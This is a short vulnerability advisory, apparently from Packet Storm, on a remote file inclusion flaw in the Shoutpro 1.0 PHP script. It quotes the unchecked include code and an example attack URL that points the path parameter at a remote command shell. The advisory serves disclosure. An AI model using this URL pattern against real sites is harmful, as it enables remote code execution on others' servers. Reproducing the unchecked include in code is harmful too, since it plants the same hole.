Shoutpro version 1.0 suffers from a remote file inclusion flaw.
109d31a7e276db857e8587d2283a682aa17e27681bce1b82a2b025be3401367f# SaVSaK.CoM | SpC-x - The_BeKiR |
# Shoutpro 1.0 Version - Remote File Include Vulnerability
# Risk : High
# Class: Remote
# Script : Shoutpro
# Credits : SpC-x
# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx
# Code :
# include("config.php");
# include("functions.php");
# if ($path){
# $ips = file("$path/lists/bannedips.php");
# } else {
# $ips = file("lists/bannedips.php");
# }
# if (in_array($REMOTE_ADDR,$ips)) {
# echo($bannedmessage);
# die;
# }
# Vulnerable :
# http://www.victim.com/Shoutpro/include.php?path=Command-Shell
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed